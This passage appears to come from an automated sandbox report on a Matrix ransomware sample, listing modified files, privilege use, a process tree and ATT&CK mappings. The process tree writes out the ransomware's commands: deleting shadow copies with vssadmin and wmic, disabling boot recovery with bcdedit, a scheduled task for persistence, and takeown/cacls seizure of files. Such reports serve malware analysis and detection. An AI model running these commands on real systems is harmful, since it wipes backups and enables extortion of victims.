Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Essential.thmx 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_zh_4.4.0.v20140623020002.jar 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00648_.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN01308_.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21310_.GIF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR22F.GIF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1740 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1504 vssadmin.exe 872 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1640 powershell.exe 1616 qKqhuGM064.exe 1616 qKqhuGM064.exe 1616 qKqhuGM064.exe 1584 powershell.exe 1584 powershell.exe 1584 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1616 qKqhuGM064.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 1616 qKqhuGM064.exe Token: SeLoadDriverPrivilege 1616 qKqhuGM064.exe Token: SeBackupPrivilege 1716 vssvc.exe Token: SeRestorePrivilege 1716 vssvc.exe Token: SeAuditPrivilege 1716 vssvc.exe Token: SeIncreaseQuotaPrivilege 660 WMIC.exe Token: SeSecurityPrivilege 660 WMIC.exe Token: SeTakeOwnershipPrivilege 660 WMIC.exe Token: SeLoadDriverPrivilege 660 WMIC.exe Token: SeSystemProfilePrivilege 660 WMIC.exe Token: SeSystemtimePrivilege 660 WMIC.exe Token: SeProfSingleProcessPrivilege 660 WMIC.exe Token: SeIncBasePriorityPrivilege 660 WMIC.exe Token: SeCreatePagefilePrivilege 660 WMIC.exe Token: SeBackupPrivilege 660 WMIC.exe Token: SeRestorePrivilege 660 WMIC.exe Token: SeShutdownPrivilege 660 WMIC.exe Token: SeDebugPrivilege 660 WMIC.exe Token: SeSystemEnvironmentPrivilege 660 WMIC.exe Token: SeRemoteShutdownPrivilege 660 WMIC.exe Token: SeUndockPrivilege 660 WMIC.exe Token: SeManageVolumePrivilege 660 WMIC.exe Token: 33 660 WMIC.exe Token: 34 660 WMIC.exe Token: 35 660 WMIC.exe Token: SeIncreaseQuotaPrivilege 660 WMIC.exe Token: SeSecurityPrivilege 660 WMIC.exe Token: SeTakeOwnershipPrivilege 660 WMIC.exe Token: SeLoadDriverPrivilege 660 WMIC.exe Token: SeSystemProfilePrivilege 660 WMIC.exe Token: SeSystemtimePrivilege 660 WMIC.exe Token: SeProfSingleProcessPrivilege 660 WMIC.exe Token: SeIncBasePriorityPrivilege 660 WMIC.exe Token: SeCreatePagefilePrivilege 660 WMIC.exe Token: SeBackupPrivilege 660 WMIC.exe Token: SeRestorePrivilege 660 WMIC.exe Token: SeShutdownPrivilege 660 WMIC.exe Token: SeDebugPrivilege 660 WMIC.exe Token: SeSystemEnvironmentPrivilege 660 WMIC.exe Token: SeRemoteShutdownPrivilege 660 WMIC.exe Token: SeUndockPrivilege 660 WMIC.exe Token: SeManageVolumePrivilege 660 WMIC.exe Token: 33 660 WMIC.exe Token: 34 660 WMIC.exe Token: 35 660 WMIC.exe Token: SeDebugPrivilege 1584 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1636 wrote to memory of 1656 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 28 PID 1636 wrote to memory of 1656 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 28 PID 1636 wrote to memory of 1656 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 28 PID 1636 wrote to memory of 1656 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 28 PID 1636 wrote to memory of 1088 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 30 PID 1636 wrote to memory of 1088 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 30 PID 1636 wrote to memory of 1088 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 30 PID 1636 wrote to memory of 1088 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 30 PID 1636 wrote to memory of 1112 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 32 PID 1636 wrote to memory of 1112 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 32 PID 1636 wrote to memory of 1112 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 32 PID 1636 wrote to memory of 1112 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 32 PID 1112 wrote to memory of 1640 1112 cmd.exe 34 PID 1112 wrote to memory of 1640 1112 cmd.exe 34 PID 1112 wrote to memory of 1640 1112 cmd.exe 34 PID 1112 wrote to memory of 1640 1112 cmd.exe 34 PID 1636 wrote to memory of 872 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 35 PID 1636 wrote to memory of 872 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 35 PID 1636 wrote to memory of 872 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 35 PID 1636 wrote to memory of 872 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 35 PID 1636 wrote to memory of 900 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 38 PID 1636 wrote to memory of 900 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 38 PID 1636 wrote to memory of 900 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 38 PID 1636 wrote to memory of 900 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 38 PID 872 wrote to memory of 1712 872 cmd.exe 40 PID 872 wrote to memory of 1712 872 cmd.exe 40 PID 872 wrote to memory of 1712 872 cmd.exe 40 PID 872 wrote to memory of 1712 872 cmd.exe 40 PID 900 wrote to memory of 1608 900 cmd.exe 39 PID 900 wrote to memory of 1608 900 cmd.exe 39 PID 900 wrote to memory of 1608 900 cmd.exe 39 PID 900 wrote to memory of 1608 900 cmd.exe 39 PID 872 wrote to memory of 1632 872 cmd.exe 41 PID 872 wrote to memory of 1632 872 cmd.exe 41 PID 872 wrote to memory of 1632 872 cmd.exe 41 PID 872 wrote to memory of 1632 872 cmd.exe 41 PID 1636 wrote to memory of 1628 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 42 PID 1636 wrote to memory of 1628 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 42 PID 1636 wrote to memory of 1628 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 42 PID 1636 wrote to memory of 1628 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 42 PID 872 wrote to memory of 1212 872 cmd.exe 43 PID 872 wrote to memory of 1212 872 cmd.exe 43 PID 872 wrote to memory of 1212 872 cmd.exe 43 PID 872 wrote to memory of 1212 872 cmd.exe 43 PID 1628 wrote to memory of 2000 1628 cmd.exe 45 PID 1628 wrote to memory of 2000 1628 cmd.exe 45 PID 1628 wrote to memory of 2000 1628 cmd.exe 45 PID 1628 wrote to memory of 2000 1628 cmd.exe 45 PID 1608 wrote to memory of 1984 1608 wscript.exe 47 PID 1608 wrote to memory of 1984 1608 wscript.exe 47 PID 1608 wrote to memory of 1984 1608 wscript.exe 47 PID 1608 wrote to memory of 1984 1608 wscript.exe 47 PID 1628 wrote to memory of 1160 1628 cmd.exe 46 PID 1628 wrote to memory of 1160 1628 cmd.exe 46 PID 1628 wrote to memory of 1160 1628 cmd.exe 46 PID 1628 wrote to memory of 1160 1628 cmd.exe 46 PID 1984 wrote to memory of 1740 1984 cmd.exe 50 PID 1984 wrote to memory of 1740 1984 cmd.exe 50 PID 1984 wrote to memory of 1740 1984 cmd.exe 50 PID 1984 wrote to memory of 1740 1984 cmd.exe 50 PID 1628 wrote to memory of 968 1628 cmd.exe 51 PID 1628 wrote to memory of 968 1628 cmd.exe 51 PID 1628 wrote to memory of 968 1628 cmd.exe 51 PID 1628 wrote to memory of 968 1628 cmd.exe 51 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2000 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe"C:\Users\Admin\AppData\Local\Temp\66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe" "C:\Users\Admin\AppData\Local\Temp\NW4cZ0HP.exe"2⤵PID:1656
-
-
C:\Users\Admin\AppData\Local\Temp\NW4cZ0HP.exe"C:\Users\Admin\AppData\Local\Temp\NW4cZ0HP.exe" -n2⤵
- Executes dropped EXE
PID:1088
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\06HbyWHA.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\kKslVIK6.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\kKslVIK6.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1712
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kX9vsdTS.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kX9vsdTS.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\dLVCWg99.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\dLVCWg99.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:568
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1088
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\XWTzfiaH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Views/modifies file attributes
PID:2000
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:1160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
PID:968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c qKqhuGM0.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1556 -
C:\Users\Admin\AppData\Local\Temp\qKqhuGM0.exeqKqhuGM0.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\qKqhuGM064.exeqKqhuGM0.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3E82F8EB-7A3E-4484-8EED-678AD0E5A628} S-1-5-21-1405931862-909307831-4085185274-1000:GZAATBZA\Admin:Interactive:[1]1⤵PID:824
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\dLVCWg99.bat"2⤵PID:1624
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:872
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584 -
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:1504
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1988
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:872
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:1352
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
2